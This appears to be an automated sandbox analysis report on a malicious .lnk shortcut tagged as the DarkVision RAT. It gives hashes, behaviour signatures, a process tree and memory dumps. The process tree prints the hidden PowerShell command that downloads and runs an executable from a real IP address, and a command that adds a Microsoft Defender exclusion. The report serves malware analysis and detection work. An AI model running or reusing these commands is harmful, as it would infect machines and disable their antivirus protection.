Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-12-2024 13:58

General

  • Target

    LPO-0048532025.lnk

  • Size

    2KB

  • MD5

    4dab3e7b78ccfc190b36eb728b6e74d0

  • SHA1

    296f5169adbc438e4ec1610d46c0f451417b7b71

  • SHA256

    b11bfaa78d9b614cf39cc02d64fe8c115085ce39c9b747913705a6520e8a7e7d

  • SHA512

    227e416b6f1f3e465d02da79c9683348d7e26c016fc7c9aa37b9e11189ecb351f0f9d992548182af6831b56e81f2301bd6169ba539aa203457b0823d27a11ee0

Malware Config

Signatures

  • DarkVision Rat

    DarkVision Rat is a trojan written in C++.

  • Darkvision family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\LPO-0048532025.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2556
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\Admin\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\Admin\AppData\Local\Temp\file.exe' }"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4504
      • C:\Users\Admin\AppData\Local\Temp\file.exe
        "C:\Users\Admin\AppData\Local\Temp\file.exe"
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:5004
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4464
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3764
        • C:\ProgramData\explorers\explorers.exe
          "C:\ProgramData\explorers\explorers.exe" {8ACDE7F8-56B2-461C-B2DA-0AAADBA16242}
          4⤵
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:4644
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1564
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3556
          • C:\Windows\explorer.exe
            "C:\Windows\explorer.exe"
            5⤵
            • Checks BIOS information in registry
            • Drops startup file
            PID:2132

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    556084f2c6d459c116a69d6fedcc4105

    SHA1

    633e89b9a1e77942d822d14de6708430a3944dbc

    SHA256

    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

    SHA512

    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    eb4d127b8a6f84a1cee423c5e3e3a51d

    SHA1

    c55263a8ff097067f2393ce2120801a445fd1949

    SHA256

    d73b077e2ae7f7608ebf774fb83ab13c7bc7a5c3e4d9d96fda2bf695dc698514

    SHA512

    45a52004f8b63ac089de017437ba0e03335f18469942795d36ce3c3d017f842e582103c91e07d9af0fa8dfbbe6f2f68f2fac91383a48b6535952a8630911f21e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    88eaf43aaf449b93e958cdac1f3f5242

    SHA1

    f6f6c5da1ad3da543ee53344debf0c21c604a6ab

    SHA256

    cb7108dd71f6af89f8661c5867cfec031c22e2e6cb09108db77286a249af79bb

    SHA512

    83c5474afd2c078284270ece6d757830340375d5b07031f1ffe3a214dd44f1319905f286cd46cdb90bd9e3738930a1e1c08677768e67c52799bbbe4e9ea5edcd

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttqtjla5.ymd.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\file.exe

    Filesize

    4.1MB

    MD5

    a3a87410c13cc37b48a9d63d84798a26

    SHA1

    170685b36ce0c7ca791b80886e88f3955a707527

    SHA256

    bbb59f158a76d0b043c7d050bba4c4ad82b94d383f9db265119a24360d7279e4

    SHA512

    1e7071749d1e96674a6a802a6317e7f71350975516f0c75fe0d0f6d987ad5d6db91ff6cba43a8c03117ddaeccc2ac40e97f10f2cba20204a645e9369fb38b543

  • memory/2132-68-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-96-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-55-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-57-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-56-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-66-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-47-0x0000000000950000-0x0000000000951000-memory.dmp

    Filesize

    4KB

  • memory/2132-48-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-60-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-61-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-74-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-75-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-78-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-77-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-76-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-83-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-82-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-81-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-58-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-99-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-80-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-79-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-73-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-72-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-70-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-69-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-63-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-71-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-59-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-67-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-65-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-62-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/2132-64-0x0000000002EB0000-0x00000000032D0000-memory.dmp

    Filesize

    4.1MB

  • memory/4504-13-0x00007FF8ABFF0000-0x00007FF8ACAB1000-memory.dmp

    Filesize

    10.8MB

  • memory/4504-2-0x00007FF8ABFF3000-0x00007FF8ABFF5000-memory.dmp

    Filesize

    8KB

  • memory/4504-10-0x00000173C5AA0000-0x00000173C5AC2000-memory.dmp

    Filesize

    136KB

  • memory/4504-27-0x00007FF8ABFF0000-0x00007FF8ACAB1000-memory.dmp

    Filesize

    10.8MB

  • memory/4504-23-0x00007FF8ABFF3000-0x00007FF8ABFF5000-memory.dmp

    Filesize

    8KB

  • memory/4504-14-0x00007FF8ABFF0000-0x00007FF8ACAB1000-memory.dmp

    Filesize

    10.8MB

  • memory/4644-114-0x00007FF72A490000-0x00007FF72A8B0000-memory.dmp

    Filesize

    4.1MB

  • memory/4644-100-0x00007FF72A490000-0x00007FF72A8B0000-memory.dmp

    Filesize

    4.1MB

  • memory/4644-101-0x00007FF72A490000-0x00007FF72A8B0000-memory.dmp

    Filesize

    4.1MB

  • memory/4644-102-0x00007FF72A490000-0x00007FF72A8B0000-memory.dmp

    Filesize

    4.1MB

  • memory/4644-103-0x00007FF72A490000-0x00007FF72A8B0000-memory.dmp

    Filesize

    4.1MB

  • memory/4644-104-0x00007FF72A490000-0x00007FF72A8B0000-memory.dmp

    Filesize

    4.1MB

  • memory/4644-105-0x00007FF72A490000-0x00007FF72A8B0000-memory.dmp

    Filesize

    4.1MB

  • memory/4644-107-0x00007FF72A490000-0x00007FF72A8B0000-memory.dmp

    Filesize

    4.1MB

  • memory/4644-108-0x00007FF72A490000-0x00007FF72A8B0000-memory.dmp

    Filesize

    4.1MB

  • memory/4644-109-0x00007FF72A490000-0x00007FF72A8B0000-memory.dmp

    Filesize

    4.1MB

  • memory/4644-110-0x00007FF72A490000-0x00007FF72A8B0000-memory.dmp

    Filesize

    4.1MB

  • memory/4644-111-0x00007FF72A490000-0x00007FF72A8B0000-memory.dmp

    Filesize

    4.1MB

  • memory/4644-112-0x00007FF72A490000-0x00007FF72A8B0000-memory.dmp

    Filesize

    4.1MB

  • memory/4644-113-0x00007FF72A490000-0x00007FF72A8B0000-memory.dmp

    Filesize

    4.1MB

  • memory/4644-34-0x00007FF72A490000-0x00007FF72A8B0000-memory.dmp

    Filesize

    4.1MB

  • memory/5004-26-0x00007FF76DEF0000-0x00007FF76E310000-memory.dmp

    Filesize

    4.1MB

  • memory/5004-33-0x00007FF76DEF0000-0x00007FF76E310000-memory.dmp

    Filesize

    4.1MB